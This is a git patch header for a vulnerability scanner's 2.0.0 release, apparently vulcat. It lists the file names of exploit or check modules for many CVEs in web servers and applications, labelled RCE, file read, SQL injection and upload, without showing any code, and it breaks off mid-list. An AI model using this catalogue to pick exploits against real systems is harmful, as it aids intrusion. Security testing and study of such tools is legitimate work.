From 124b7ddd7bb5ac5292ae1d87878081d53bea49ad Mon Sep 17 00:00:00 2001 From: CLincat <3132002932@qq.com> Date: Wed, 15 Mar 2023 19:28:18 +0800 Subject: [PATCH] 20230315-v2.0.0 --- PluginManager.py | 148 ++++++ README.en-us.md | 364 +++++++-------- README.md | 351 +++++++------- config.yaml | 29 +- demo.py | 17 + lib/api/dns.py | 5 +- lib/core/client.py | 6 +- lib/core/coreScan.py | 139 ++---- lib/initial/config.py | 21 +- lib/initial/language.py | 46 +- lib/initial/list.py | 376 ++++++--------- lib/initial/parse.py | 17 +- lib/plugins/fingerprint/webapp.py | 68 ++- lib/plugins/shell.py | 4 + lib/tool/check.py | 30 +- lib/tool/color.py | 22 +- payloads/74cms/74cms-v5.0.1-sqlinject.py | 59 +++ payloads/74cms/74cms-v6.0.4-xss.py | 58 +++ payloads/AlibabaDruid/alibaba-druid-unauth.py | 71 +++ payloads/AlibabaDruid/main.py | 27 -- payloads/AlibabaDruid/unauth.py | 58 --- .../alibaba-nacos-cve-2021-29441-unauth.py | 100 ++++ payloads/AlibabaNacos/cve_2021_29441.py | 86 ---- payloads/AlibabaNacos/main.py | 26 -- .../apache-apisix-cve-2020-13945-unauth.py | 109 +++++ payloads/ApacheAPISIX/cve_2020_13945.py | 96 ---- payloads/ApacheAPISIX/main.py | 27 -- .../apache-airflow-cve-2020-17526-unauth.py | 116 +++++ payloads/ApacheAirflow/cve_2020_17526.py | 101 ---- payloads/ApacheAirflow/main.py | 31 -- .../apache-druid-cve-2021-25646-rce.py | 109 +++++ .../apache-druid-cve-2021-36749-fileread.py | 91 ++++ payloads/ApacheDruid/cve_2021_25646.py | 94 ---- payloads/ApacheDruid/cve_2021_36749.py | 77 --- payloads/ApacheDruid/main.py | 39 -- .../apache-flink-cve-2020-17519-fileread.py | 60 +++ payloads/ApacheFlink/cve_2020_17519.py | 56 --- payloads/ApacheFlink/main.py | 28 -- payloads/ApacheHadoop/apache-hadoop-unauth.py | 73 +++ payloads/ApacheHadoop/main.py | 30 -- payloads/ApacheHadoop/new_unauth.py | 57 --- payloads/ApacheHadoop/old_unauth.py | 99 ---- ...py => apache-httpd-cve-2021-40438-ssrf.py} | 96 ++-- ...pache-httpd-cve-2021-41773-rce-fileread.py | 114 +++++ ...pache-httpd-cve-2021-42013-rce-fileread.py | 103 ++++ payloads/ApacheHttpd/cve_2021_41773.py | 98 ---- payloads/ApacheHttpd/cve_2021_42013.py | 87 ---- payloads/ApacheHttpd/main.py | 45 -- payloads/ApacheKafka/cve_2023_25194.py | 95 ---- payloads/ApacheKafka/main.py | 34 -- ...ache-skywalking-cve-2020-9483-sqlinject.py | 67 +++ payloads/ApacheSkyWalking/cve_2020_9483.py | 77 --- payloads/ApacheSkyWalking/main.py | 32 -- .../apache-solr-cve-2017-12629-rce.py | 127 +++++ .../apache-solr-cve-2019-17558-rce.py | 69 +++ ...pache-solr-cve-2021-27905-ssrf-fileread.py | 76 +++ payloads/ApacheSolr/cve_2017_12629.py | 112 ----- payloads/ApacheSolr/cve_2019_17558.py | 57 --- payloads/ApacheSolr/cve_2021_27905.py | 56 --- payloads/ApacheSolr/main.py | 53 --- payloads/ApacheSolr/tool_enable.py | 27 +- ...apache-tomcat-cve-2017-12615-fileupload.py | 94 ++++ payloads/ApacheTomcat/cve_2017_12615.py | 80 ---- payloads/ApacheTomcat/main.py | 28 -- .../apache-unomi-cve-2020-13942-rce.py | 106 +++++ payloads/ApacheUnomi/cve_2020_13942.py | 92 ---- payloads/ApacheUnomi/main.py | 33 -- .../AppWeb/appweb-cve-2018-8715-unauth.py | 91 ++++ payloads/AppWeb/cve_2018_8715.py | 75 --- payloads/AppWeb/main.py | 33 -- ...ence-cve-2015-8399-fileread-fileinclude.py | 78 ++++ ...ssian-confluence-cve-2019-3396-fileread.py | 88 ++++ ...atlassian-confluence-cve-2021-26084-rce.py | 76 +++ ...atlassian-confluence-cve-2022-26134-rce.py | 80 ++++ payloads/AtlassianConfluence/cve_2015_8399.py | 63 --- payloads/AtlassianConfluence/cve_2019_3396.py | 73 --- .../AtlassianConfluence/cve_2021_26084.py | 61 --- .../AtlassianConfluence/cve_2022_26134.py | 64 --- payloads/AtlassianConfluence/main.py | 50 -- payloads/Cisco/cisco-cve-2020-3580-xss.py | 73 +++ payloads/Cisco/cve_2020_3580.py | 61 --- payloads/Cisco/main.py | 26 -- .../Discuz/discuz-wooyun-2010-080723-rce.py | 76 +++ payloads/Discuz/main.py | 31 -- payloads/Discuz/wooyun_2010_080723.py | 61 --- payloads/Django/cve_2017_12794.py | 65 --- payloads/Django/cve_2018_14574.py | 44 -- payloads/Django/cve_2019_14234.py | 53 --- payloads/Django/cve_2020_9402.py | 48 -- payloads/Django/cve_2021_35042.py | 48 -- payloads/Django/django-cve-2017-12794-xss.py | 80 ++++ .../Django/django-cve-2018-14574-redirect.py | 58 +++ .../Django/django-cve-2019-14234-sqlinject.py | 69 +++ .../Django/django-cve-2020-9402-sqlinject.py | 64 +++ .../Django/django-cve-2021-35042-sqlinject.py | 63 +++ payloads/Django/main.py | 63 --- payloads/Django/tool_get_urlconf.py | 4 +- payloads/Drupal/cve_2014_3704.py | 47 -- payloads/Drupal/cve_2017_6920.py | 68 --- payloads/Drupal/cve_2018_7600.py | 52 --- payloads/Drupal/cve_2018_7602.py | 79 ---- .../Drupal/drupal-cve-2014-3704-sqlinject.py | 61 +++ payloads/Drupal/drupal-cve-2017-6920-rce.py | 84 ++++ payloads/Drupal/drupal-cve-2018-7600-rce.py | 68 +++ payloads/Drupal/drupal-cve-2018-7602-rce.py | 96 ++++ payloads/Drupal/main.py | 56 --- payloads/Drupal/tool_get_token.py | 2 +- payloads/ElasticSearch/cve_2014_3120.py | 58 --- payloads/ElasticSearch/cve_2015_1427.py | 58 --- payloads/ElasticSearch/cve_2015_3337.py | 48 -- payloads/ElasticSearch/cve_2015_5531.py | 80 ---- .../elasticsearch-cve-2014-3120-rce.py | 73 +++ .../elasticsearch-cve-2015-1427-rce.py | 73 +++ .../elasticsearch-cve-2015-3337-fileread.py | 64 +++ .../elasticsearch-cve-2015-5531-fileread.py | 95 ++++ payloads/ElasticSearch/main.py | 50 -- payloads/F5BIGIP/cve_2020_5902.py | 52 --- payloads/F5BIGIP/cve_2022_1388.py | 64 --- .../f5bigip-cve-2020-5902-rce-fileread.py | 67 +++ .../f5bigip-cve-2022-1388-unauth-rce.py | 79 ++++ payloads/F5BIGIP/main.py | 36 -- payloads/Fastjson/cnvd_2017_02833.py | 53 --- payloads/Fastjson/cnvd_2019_22238.py | 53 --- .../Fastjson/fastjson-cnvd-2017-02833-rce.py | 68 +++ .../Fastjson/fastjson-cnvd-2019-22238-rce.py | 71 +++ payloads/Fastjson/fastjson-v1.2.62-rce.py | 73 +++ payloads/Fastjson/fastjson-v1.2.66-rce.py | 73 +++ payloads/Fastjson/main.py | 50 -- payloads/Fastjson/rce_1_2_62.py | 59 --- payloads/Fastjson/rce_1_2_66.py | 59 --- payloads/Gitea/gitea-unauth-fileread-rce.py | 85 ++++ payloads/Gitea/main.py | 32 -- payloads/Gitea/unauth.py | 68 --- payloads/Gitlab/cve_2021_22205.py | 107 ----- payloads/Gitlab/cve_2021_22214.py | 67 --- payloads/Gitlab/gitlab-cve-2021-22205-rce.py | 128 +++++ payloads/Gitlab/gitlab-cve-2021-22214-ssrf.py | 80 ++++ payloads/Gitlab/main.py | 49 -- payloads/GoCD/cve_2021_43287.py | 47 -- payloads/GoCD/gocd-cve-2021-43287-fileread.py | 64 +++ payloads/GoCD/main.py | 33 -- payloads/Grafana/cve_2021_43798.py | 69 --- .../grafana-cve-2021-43798-fileread.py | 81 ++++ payloads/Grafana/main.py | 31 -- payloads/Influxdb/influxdb-unauth.py | 72 +++ payloads/Influxdb/main.py | 32 -- payloads/Influxdb/unauth.py | 52 --- payloads/JBoss/jboss-unauth.py | 72 +++ payloads/JBoss/main.py | 37 -- payloads/JBoss/unauth.py | 56 --- payloads/Jenkins/cve_2018_1000861.py | 56 --- .../Jenkins/jenkins-cve-2018-1000861-rce.py | 69 +++ payloads/Jenkins/jenkins-unauth.py | 72 +++ payloads/Jenkins/main.py | 39 -- payloads/Jenkins/unauth.py | 58 --- payloads/Jetty/cve_2021_28164.py | 44 -- payloads/Jetty/cve_2021_28169.py | 44 -- payloads/Jetty/cve_2021_34429.py | 47 -- payloads/Jetty/jetty-cve-2021-28164-dsinfo.py | 60 +++ payloads/Jetty/jetty-cve-2021-28169-dsinfo.py | 62 +++ payloads/Jetty/jetty-cve-2021-34429-dsinfo.py | 63 +++ payloads/Jetty/main.py | 44 -- payloads/Joomla/cve_2017_8917.py | 49 -- .../Joomla/joomla-cve-2017-8917-sqlinject.py | 71 +++ ...752.py => joomla-cve-2023-23752-unauth.py} | 105 +++-- payloads/Joomla/main.py | 44 -- payloads/Jupyter/jupyter-unauth.py | 61 +++ payloads/Jupyter/main.py | 32 -- payloads/Jupyter/unauth.py | 45 -- payloads/Keycloak/cve_2020_10770.py | 49 -- .../Keycloak/keycloak-cve-2020-10770-ssrf.py | 63 +++ payloads/Keycloak/main.py | 28 -- payloads/Kindeditor/cve_2018_18950.py | 40 -- payloads/Kindeditor/main.py | 31 -- payloads/Landray/cnvd_2021_28277.py | 107 ----- ...andray-oa-cnvd-2021-28277-ssrf-fileread.py | 123 +++++ payloads/Landray/main.py | 32 -- payloads/MiniHttpd/cve_2018_18778.py | 43 -- payloads/MiniHttpd/main.py | 32 -- .../minihttpd-cve-2018-18778-fileread.py | 59 +++ payloads/MongoExpress/cve_2019_10758.py | 81 ---- payloads/MongoExpress/main.py | 31 -- .../mongoexpress-cve-2019-10758-rce.py | 95 ++++ payloads/Nexus/cve_2019_15588.py | 69 --- payloads/Nexus/cve_2019_5475.py | 71 --- payloads/Nexus/cve_2019_7238.py | 87 ---- payloads/Nexus/cve_2020_10199.py | 99 ---- payloads/Nexus/cve_2020_10204.py | 94 ---- payloads/Nexus/main.py | 69 --- payloads/Nexus/nexus-cve-2019-15588-rce.py | 87 ++++ payloads/Nexus/nexus-cve-2019-5475-rce.py | 89 ++++ payloads/Nexus/nexus-cve-2019-7238-rce.py | 101 ++++ payloads/Nexus/nexus-cve-2020-10199-rce.py | 114 +++++ payloads/Nexus/nexus-cve-2020-10204-rce.py | 113 +++++ payloads/Nexus/tool_get_yumid.py | 2 +- payloads/NodeRED/cve_2021_3223.py | 51 -- payloads/NodeRED/main.py | 31 -- .../NodeRED/nodered-cve-2021-3223-fileread.py | 66 +++ payloads/Nodejs/cve_2017_14849.py | 46 -- payloads/Nodejs/cve_2021_21315.py | 53 --- payloads/Nodejs/main.py | 37 -- .../Nodejs/nodejs-cve-2017-14849-fileread.py | 61 +++ payloads/Nodejs/nodejs-cve-2021-21315-rce.py | 66 +++ payloads/RubyOnRails/cve_2018_3760.py | 79 ---- payloads/RubyOnRails/cve_2019_5418.py | 44 -- payloads/RubyOnRails/cve_2020_8163.py | 48 -- payloads/RubyOnRails/main.py | 44 -- .../ruby-on-rails-cve-2018-3760-fileread.py | 95 ++++ .../ruby-on-rails-cve-2019-5418-fileread.py | 65 +++ .../ruby-on-rails-cve-2020-8163-rce.py | 69 +++ payloads/RubyOnRails/tool_get_route_path.py | 31 ++ payloads/ShowDoc/cnvd_2020_26585.py | 74 --- payloads/ShowDoc/main.py | 32 -- .../showdoc-cnvd-2020-26585-fileupload.py | 94 ++++ payloads/Spring/cve_2016_4977.py | 48 -- payloads/Spring/cve_2017_8046.py | 80 ---- payloads/Spring/cve_2018_1273.py | 68 --- payloads/Spring/cve_2020_5410.py | 42 -- payloads/Spring/cve_2021_21234.py | 44 -- payloads/Spring/cve_2022_22947.py | 91 ---- payloads/Spring/cve_2022_22963.py | 78 ---- payloads/Spring/cve_2022_22965.py | 81 ---- payloads/Spring/main.py | 72 --- .../spring-boot-cve-2021-21234-fileread.py | 59 +++ ...ing-cloud-config-cve-2020-5410-fileread.py | 57 +++ ...pring-cloud-function-cve-2022-22963-rce.py | 91 ++++ ...spring-cloud-gateway-cve-2022-22947-rce.py | 106 +++++ payloads/Spring/spring-cve-2022-22965-rce.py | 97 ++++ .../spring-data-commons-cve-2018-1273-rce.py | 81 ++++ .../spring-data-rest-cve-2017-8046-rce.py | 94 ++++ ...spring-security-oauth-cve-2016-4977-rce.py | 63 +++ payloads/Supervisor/cve_2017_11610.py | 91 ---- payloads/Supervisor/main.py | 33 -- .../supervisor-cve-2017-11610-rce.py | 107 +++++ payloads/ThinkPHP/_2_x_rce.py | 39 -- payloads/ThinkPHP/_5_ids_sqlinject.py | 36 -- payloads/ThinkPHP/cnnvd_201901_445.py | 47 -- payloads/ThinkPHP/cnvd_2018_24942.py | 48 -- payloads/ThinkPHP/cnvd_2022_86535.py | 98 ---- payloads/ThinkPHP/cve_2018_1002015.py | 63 --- payloads/ThinkPHP/main.py | 95 ---- payloads/ThinkPHP/main.txt | 36 ++ payloads/ThinkPHP/thinkphp-2.x-rce.py | 55 +++ payloads/ThinkPHP/thinkphp-5-ids-sqlinject.py | 53 +++ .../ThinkPHP/thinkphp-cnnvd-201901-445-rce.py | 67 +++ .../ThinkPHP/thinkphp-cnvd-2018-24942-rce.py | 64 +++ .../ThinkPHP/thinkphp-cnvd-2022-86535-rce.py | 113 +++++ .../ThinkPHP/thinkphp-cve-2018-1002015-rce.py | 78 ++++ payloads/Ueditor/main.py | 29 -- payloads/Ueditor/ssrf.py | 56 --- payloads/Ueditor/ueditor-ssrf.py | 70 +++ payloads/VMware/test.tar | Bin 0 -> 10240 bytes .../VMware/vmware-vcenter-2020-10-fileread.py | 72 +++ ...e-vcenter-cve-2021-21972-fileupload-rce.py | 100 ++++ payloads/Weblogic/cve_2014_4210.py | 48 -- payloads/Weblogic/cve_2017_10271.py | 85 ---- payloads/Weblogic/cve_2019_2725.py | 80 ---- payloads/Weblogic/cve_2020_14750.py | 66 --- payloads/Weblogic/cve_2020_14882.py | 58 --- payloads/Weblogic/cve_2021_2109.py | 84 ---- payloads/Weblogic/main.py | 55 --- .../oracle-weblogic-cve-2014-4210-ssrf.py | 61 +++ ...cle-weblogic-cve-2017-10271-unserialize.py | 101 ++++ ...acle-weblogic-cve-2019-2725-unserialize.py | 112 +++++ .../oracle-weblogic-cve-2020-14750-bypass.py | 83 ++++ ...acle-weblogic-cve-2020-14882-rce-unauth.py | 72 +++ .../oracle-weblogic-cve-2021-2109-rce.py | 102 ++++ payloads/Webmin/cve_2019_15107.py | 55 --- payloads/Webmin/cve_2019_15642.py | 65 --- payloads/Webmin/main.py | 37 -- payloads/Webmin/webmin-cve-2019-15107-rce.py | 72 +++ payloads/Webmin/webmin-cve-2019-15642-rce.py | 80 ++++ payloads/Yonyou/cnnvd_201610_923.py | 52 --- payloads/Yonyou/cnvd_2021_30167.py | 106 ----- payloads/Yonyou/main.py | 52 --- payloads/Yonyou/nc_fileread.py | 38 -- payloads/Yonyou/u8_oa_getsession.py | 41 -- payloads/Yonyou/u8_oa_test_sqlinject.py | 38 -- .../yonyou-erp-nc-ncfindweb-fileread.py | 53 +++ ...onyou-grp-u8-cnnvd-201610-923-sqlinject.py | 67 +++ .../Yonyou/yonyou-nc-cnvd-2021-30167-rce.py | 121 +++++ .../Yonyou/yonyou-u8-oa-getsession-dsinfo.py | 57 +++ .../Yonyou/yonyou-u8-oa-test.jsp-sqlinject.py | 55 +++ payloads/Zabbix/cve_2016_10134.py | 46 -- payloads/Zabbix/main.py | 33 -- .../Zabbix/zabbix-cve-2016-10134-sqlinject.py | 61 +++ payloads/demo/main.py | 43 -- payloads/demo/scan.py | 71 --- payloads/demo/scan_2.py | 76 --- payloads/phpMyadmin/cve_2018_12613.py | 41 -- payloads/phpMyadmin/main.py | 38 -- ...min-cve-2018-12613-fileinclude-fileread.py | 57 +++ ...pmyadmin-wooyun-2016-199433-unserialize.py | 80 ++++ payloads/phpMyadmin/wooyun_2016_199433.py | 64 --- payloads/phpUint/cve_2017_9841.py | 58 --- payloads/phpUint/main.py | 32 -- payloads/phpUint/phpunit-cve-2017-9841-rce.py | 78 ++++ payloads/uWSGIPHP/cve_2018_7490.py | 42 -- payloads/uWSGIPHP/main.py | 32 -- .../uwsgiphp-cve-2018-7490-fileread.py | 57 +++ requirements.txt | 6 +- thirdparty/requests/__init__.py | 94 ++-- thirdparty/requests/__version__.py | 20 +- thirdparty/requests/_internal_utils.py | 24 +- thirdparty/requests/adapters.py | 229 +++++---- thirdparty/requests/api.py | 18 +- thirdparty/requests/auth.py | 156 ++++--- thirdparty/requests/certs.py | 3 +- thirdparty/requests/compat.py | 90 ++-- thirdparty/requests/cookies.py | 152 +++--- thirdparty/requests/exceptions.py | 32 +- thirdparty/requests/help.py | 101 ++-- thirdparty/requests/hooks.py | 7 +- thirdparty/requests/models.py | 360 ++++++++------ thirdparty/requests/packages.py | 16 +- thirdparty/requests/sessions.py | 288 +++++++----- thirdparty/requests/status_codes.py | 169 +++---- thirdparty/requests/structures.py | 12 +- thirdparty/requests/utils.py | 439 ++++++++++-------- vulcat.py | 7 +- 320 files changed, 11074 insertions(+), 11145 deletions(-) create mode 100644 PluginManager.py create mode 100644 demo.py create mode 100644 payloads/74cms/74cms-v5.0.1-sqlinject.py create mode 100644 payloads/74cms/74cms-v6.0.4-xss.py create mode 100644 payloads/AlibabaDruid/alibaba-druid-unauth.py delete mode 100644 payloads/AlibabaDruid/main.py delete mode 100644 payloads/AlibabaDruid/unauth.py create mode 100644 payloads/AlibabaNacos/alibaba-nacos-cve-2021-29441-unauth.py delete mode 100644 payloads/AlibabaNacos/cve_2021_29441.py delete mode 100644 payloads/AlibabaNacos/main.py create mode 100644 payloads/ApacheAPISIX/apache-apisix-cve-2020-13945-unauth.py delete mode 100644 payloads/ApacheAPISIX/cve_2020_13945.py delete mode 100644 payloads/ApacheAPISIX/main.py create mode 100644 payloads/ApacheAirflow/apache-airflow-cve-2020-17526-unauth.py delete mode 100644 payloads/ApacheAirflow/cve_2020_17526.py delete mode 100644 payloads/ApacheAirflow/main.py create mode 100644 payloads/ApacheDruid/apache-druid-cve-2021-25646-rce.py create mode 100644 payloads/ApacheDruid/apache-druid-cve-2021-36749-fileread.py delete mode 100644 payloads/ApacheDruid/cve_2021_25646.py delete mode 100644 payloads/ApacheDruid/cve_2021_36749.py delete mode 100644 payloads/ApacheDruid/main.py create mode 100644 payloads/ApacheFlink/apache-flink-cve-2020-17519-fileread.py delete mode 100644 payloads/ApacheFlink/cve_2020_17519.py delete mode 100644 payloads/ApacheFlink/main.py create mode 100644 payloads/ApacheHadoop/apache-hadoop-unauth.py delete mode 100644 payloads/ApacheHadoop/main.py delete mode 100644 payloads/ApacheHadoop/new_unauth.py delete mode 100644 payloads/ApacheHadoop/old_unauth.py rename payloads/ApacheHttpd/{cve_2021_40438.py => apache-httpd-cve-2021-40438-ssrf.py} (71%) create mode 100644 payloads/ApacheHttpd/apache-httpd-cve-2021-41773-rce-fileread.py create mode 100644 payloads/ApacheHttpd/apache-httpd-cve-2021-42013-rce-fileread.py delete mode 100644 payloads/ApacheHttpd/cve_2021_41773.py delete mode 100644 payloads/ApacheHttpd/cve_2021_42013.py delete mode 100644 payloads/ApacheHttpd/main.py delete mode 100644 payloads/ApacheKafka/cve_2023_25194.py delete mode 100644 payloads/ApacheKafka/main.py create mode 100644 payloads/ApacheSkyWalking/apache-skywalking-cve-2020-9483-sqlinject.py delete mode 100644 payloads/ApacheSkyWalking/cve_2020_9483.py delete mode 100644 payloads/ApacheSkyWalking/main.py create mode 100644 payloads/ApacheSolr/apache-solr-cve-2017-12629-rce.py create mode 100644 payloads/ApacheSolr/apache-solr-cve-2019-17558-rce.py create mode 100644 payloads/ApacheSolr/apache-solr-cve-2021-27905-ssrf-fileread.py delete mode 100644 payloads/ApacheSolr/cve_2017_12629.py delete mode 100644 payloads/ApacheSolr/cve_2019_17558.py delete mode 100644 payloads/ApacheSolr/cve_2021_27905.py delete mode 100644 payloads/ApacheSolr/main.py create mode 100644 payloads/ApacheTomcat/apache-tomcat-cve-2017-12615-fileupload.py delete mode 100644 payloads/ApacheTomcat/cve_2017_12615.py delete mode 100644 payloads/ApacheTomcat/main.py create mode 100644 payloads/ApacheUnomi/apache-unomi-cve-2020-13942-rce.py delete mode 100644 payloads/ApacheUnomi/cve_2020_13942.py delete mode 100644 payloads/ApacheUnomi/main.py create mode 100644 payloads/AppWeb/appweb-cve-2018-8715-unauth.py delete mode 100644 payloads/AppWeb/cve_2018_8715.py delete mode 100644 payloads/AppWeb/main.py create mode 100644 payloads/AtlassianConfluence/atlassian-confluence-cve-2015-8399-fileread-fileinclude.py create mode 100644 payloads/AtlassianConfluence/atlassian-confluence-cve-2019-3396-fileread.py create mode 100644 payloads/AtlassianConfluence/atlassian-confluence-cve-2021-26084-rce.py create mode 100644 payloads/AtlassianConfluence/atlassian-confluence-cve-2022-26134-rce.py delete mode 100644 payloads/AtlassianConfluence/cve_2015_8399.py delete mode 100644 payloads/AtlassianConfluence/cve_2019_3396.py delete mode 100644 payloads/AtlassianConfluence/cve_2021_26084.py delete mode 100644 payloads/AtlassianConfluence/cve_2022_26134.py delete mode 100644 payloads/AtlassianConfluence/main.py create mode 100644 payloads/Cisco/cisco-cve-2020-3580-xss.py delete mode 100644 payloads/Cisco/cve_2020_3580.py delete mode 100644 payloads/Cisco/main.py create mode 100644 payloads/Discuz/discuz-wooyun-2010-080723-rce.py delete mode 100644 payloads/Discuz/main.py delete mode 100644 payloads/Discuz/wooyun_2010_080723.py delete mode 100644 payloads/Django/cve_2017_12794.py delete mode 100644 payloads/Django/cve_2018_14574.py delete mode 100644 payloads/Django/cve_2019_14234.py delete mode 100644 payloads/Django/cve_2020_9402.py delete mode 100644 payloads/Django/cve_2021_35042.py create mode 100644 payloads/Django/django-cve-2017-12794-xss.py create mode 100644 payloads/Django/django-cve-2018-14574-redirect.py create mode 100644 payloads/Django/django-cve-2019-14234-sqlinject.py create mode 100644 payloads/Django/django-cve-2020-9402-sqlinject.py create mode 100644 payloads/Django/django-cve-2021-35042-sqlinject.py delete mode 100644 payloads/Django/main.py delete mode 100644 payloads/Drupal/cve_2014_3704.py delete mode 100644 payloads/Drupal/cve_2017_6920.py delete mode 100644 payloads/Drupal/cve_2018_7600.py delete mode 100644 payloads/Drupal/cve_2018_7602.py create mode 100644 payloads/Drupal/drupal-cve-2014-3704-sqlinject.py create mode 100644 payloads/Drupal/drupal-cve-2017-6920-rce.py create mode 100644 payloads/Drupal/drupal-cve-2018-7600-rce.py create mode 100644 payloads/Drupal/drupal-cve-2018-7602-rce.py delete mode 100644 payloads/Drupal/main.py delete mode 100644 payloads/ElasticSearch/cve_2014_3120.py delete mode 100644 payloads/ElasticSearch/cve_2015_1427.py delete mode 100644 payloads/ElasticSearch/cve_2015_3337.py delete mode 100644 payloads/ElasticSearch/cve_2015_5531.py create mode 100644 payloads/ElasticSearch/elasticsearch-cve-2014-3120-rce.py create mode 100644 payloads/ElasticSearch/elasticsearch-cve-2015-1427-rce.py create mode 100644 payloads/ElasticSearch/elasticsearch-cve-2015-3337-fileread.py create mode 100644 payloads/ElasticSearch/elasticsearch-cve-2015-5531-fileread.py delete mode 100644 payloads/ElasticSearch/main.py delete mode 100644 payloads/F5BIGIP/cve_2020_5902.py delete mode 100644 payloads/F5BIGIP/cve_2022_1388.py create mode 100644 payloads/F5BIGIP/f5bigip-cve-2020-5902-rce-fileread.py create mode 100644 payloads/F5BIGIP/f5bigip-cve-2022-1388-unauth-rce.py delete mode 100644 payloads/F5BIGIP/main.py delete mode 100644 payloads/Fastjson/cnvd_2017_02833.py delete mode 100644 payloads/Fastjson/cnvd_2019_22238.py create mode 100644 payloads/Fastjson/fastjson-cnvd-2017-02833-rce.py create mode 100644 payloads/Fastjson/fastjson-cnvd-2019-22238-rce.py create mode 100644 payloads/Fastjson/fastjson-v1.2.62-rce.py create mode 100644 payloads/Fastjson/fastjson-v1.2.66-rce.py delete mode 100644 payloads/Fastjson/main.py delete mode 100644 payloads/Fastjson/rce_1_2_62.py delete mode 100644 payloads/Fastjson/rce_1_2_66.py create mode 100644 payloads/Gitea/gitea-unauth-fileread-rce.py delete mode 100644 payloads/Gitea/main.py delete mode 100644 payloads/Gitea/unauth.py delete mode 100644 payloads/Gitlab/cve_2021_22205.py delete mode 100644 payloads/Gitlab/cve_2021_22214.py create mode 100644 payloads/Gitlab/gitlab-cve-2021-22205-rce.py create mode 100644 payloads/Gitlab/gitlab-cve-2021-22214-ssrf.py delete mode 100644 payloads/Gitlab/main.py delete mode 100644 payloads/GoCD/cve_2021_43287.py create mode 100644 payloads/GoCD/gocd-cve-2021-43287-fileread.py delete mode 100644 payloads/GoCD/main.py delete mode 100644 payloads/Grafana/cve_2021_43798.py create mode 100644 payloads/Grafana/grafana-cve-2021-43798-fileread.py delete mode 100644 payloads/Grafana/main.py create mode 100644 payloads/Influxdb/influxdb-unauth.py delete mode 100644 payloads/Influxdb/main.py delete mode 100644 payloads/Influxdb/unauth.py create mode 100644 payloads/JBoss/jboss-unauth.py delete mode 100644 payloads/JBoss/main.py delete mode 100644 payloads/JBoss/unauth.py delete mode 100644 payloads/Jenkins/cve_2018_1000861.py create mode 100644 payloads/Jenkins/jenkins-cve-2018-1000861-rce.py create mode 100644 payloads/Jenkins/jenkins-unauth.py delete mode 100644 payloads/Jenkins/main.py delete mode 100644 payloads/Jenkins/unauth.py delete mode 100644 payloads/Jetty/cve_2021_28164.py delete mode 100644 payloads/Jetty/cve_2021_28169.py delete mode 100644 payloads/Jetty/cve_2021_34429.py create mode 100644 payloads/Jetty/jetty-cve-2021-28164-dsinfo.py create mode 100644 payloads/Jetty/jetty-cve-2021-28169-dsinfo.py create mode 100644 payloads/Jetty/jetty-cve-2021-34429-dsinfo.py delete mode 100644 payloads/Jetty/main.py delete mode 100644 payloads/Joomla/cve_2017_8917.py create mode 100644 payloads/Joomla/joomla-cve-2017-8917-sqlinject.py rename payloads/Joomla/{cve_2023_23752.py => joomla-cve-2023-23752-unauth.py} (76%) delete mode 100644 payloads/Joomla/main.py create mode 100644 payloads/Jupyter/jupyter-unauth.py delete mode 100644 payloads/Jupyter/main.py delete mode 100644 payloads/Jupyter/unauth.py delete mode 100644 payloads/Keycloak/cve_2020_10770.py create mode 100644 payloads/Keycloak/keycloak-cve-2020-10770-ssrf.py delete mode 100644 payloads/Keycloak/main.py delete mode 100644 payloads/Kindeditor/cve_2018_18950.py delete mode 100644 payloads/Kindeditor/main.py delete mode 100644 payloads/Landray/cnvd_2021_28277.py create mode 100644 payloads/Landray/landray-oa-cnvd-2021-28277-ssrf-fileread.py delete mode 100644 payloads/Landray/main.py delete mode 100644 payloads/MiniHttpd/cve_2018_18778.py delete mode 100644 payloads/MiniHttpd/main.py create mode 100644 payloads/MiniHttpd/minihttpd-cve-2018-18778-fileread.py delete mode 100644 payloads/MongoExpress/cve_2019_10758.py delete mode 100644 payloads/MongoExpress/main.py create mode 100644 payloads/MongoExpress/mongoexpress-cve-2019-10758-rce.py delete mode 100644 payloads/Nexus/cve_2019_15588.py delete mode 100644 payloads/Nexus/cve_2019_5475.py delete mode 100644 payloads/Nexus/cve_2019_7238.py delete mode 100644 payloads/Nexus/cve_2020_10199.py delete mode 100644 payloads/Nexus/cve_2020_10204.py delete mode 100644 payloads/Nexus/main.py create mode 100644 payloads/Nexus/nexus-cve-2019-15588-rce.py create mode 100644 payloads/Nexus/nexus-cve-2019-5475-rce.py create mode 100644 payloads/Nexus/nexus-cve-2019-7238-rce.py create mode 100644 payloads/Nexus/nexus-cve-2020-10199-rce.py create mode 100644 payloads/Nexus/nexus-cve-2020-10204-rce.py delete mode 100644 payloads/NodeRED/cve_2021_3223.py delete mode 100644 payloads/NodeRED/main.py create mode 100644 payloads/NodeRED/nodered-cve-2021-3223-fileread.py delete mode 100644 payloads/Nodejs/cve_2017_14849.py delete mode 100644 payloads/Nodejs/cve_2021_21315.py delete mode 100644 payloads/Nodejs/main.py create mode 100644 payloads/Nodejs/nodejs-cve-2017-14849-fileread.py create mode 100644 payloads/Nodejs/nodejs-cve-2021-21315-rce.py delete mode 100644 payloads/RubyOnRails/cve_2018_3760.py delete mode 100644 payloads/RubyOnRails/cve_2019_5418.py delete mode 100644 payloads/RubyOnRails/cve_2020_8163.py delete mode 100644 payloads/RubyOnRails/main.py create mode 100644 payloads/RubyOnRails/ruby-on-rails-cve-2018-3760-fileread.py create mode 100644 payloads/RubyOnRails/ruby-on-rails-cve-2019-5418-fileread.py create mode 100644 payloads/RubyOnRails/ruby-on-rails-cve-2020-8163-rce.py create mode 100644 payloads/RubyOnRails/tool_get_route_path.py delete mode 100644 payloads/ShowDoc/cnvd_2020_26585.py delete mode 100644 payloads/ShowDoc/main.py create mode 100644 payloads/ShowDoc/showdoc-cnvd-2020-26585-fileupload.py delete mode 100644 payloads/Spring/cve_2016_4977.py delete mode 100644 payloads/Spring/cve_2017_8046.py delete mode 100644 payloads/Spring/cve_2018_1273.py delete mode 100644 payloads/Spring/cve_2020_5410.py delete mode 100644 payloads/Spring/cve_2021_21234.py delete mode 100644 payloads/Spring/cve_2022_22947.py delete mode 100644 payloads/Spring/cve_2022_22963.py delete mode 100644 payloads/Spring/cve_2022_22965.py delete mode 100644 payloads/Spring/main.py create mode 100644 payloads/Spring/spring-boot-cve-2021-21234-fileread.py create mode 100644 payloads/Spring/spring-cloud-config-cve-2020-5410-fileread.py create mode 100644 payloads/Spring/spring-cloud-function-cve-2022-22963-rce.py create mode 100644 payloads/Spring/spring-cloud-gateway-cve-2022-22947-rce.py create mode 100644 payloads/Spring/spring-cve-2022-22965-rce.py create mode 100644 